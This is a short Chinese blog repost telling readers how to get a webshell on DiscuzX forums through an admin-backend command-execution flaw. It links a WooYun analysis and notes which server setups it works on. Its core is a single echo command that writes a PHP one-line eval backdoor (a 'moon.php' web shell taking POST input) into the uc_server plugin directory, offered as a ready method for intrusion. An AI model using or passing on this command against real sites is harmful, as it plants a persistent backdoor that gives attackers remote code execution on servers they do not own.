菜单

DiscuzX系列后台GETSHELL附方法

2017年10月2日 - 转载

最近不少学员来问道 dzx 后台怎么拿WEBSHELL。
最近刚好有个洞洞,不过很多人还是不知道噢,因为很多论坛没有公布具体方法。
wooyun知识库发了恩多Dx的洞洞分析
http://drops.wooyun.org/papers/4611
。。。。。。。。。。。。。。。。。。。
既然可以执行命令。基本上可以拿SHELL
但是有一定的局限。iis基本没权限
linux win Apache的还是可以的
拿webshell方法、如下

echo '^<?php eval($_POST[moon]);?^>' >uc_server/plugin/filecheck/moon.php&
标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据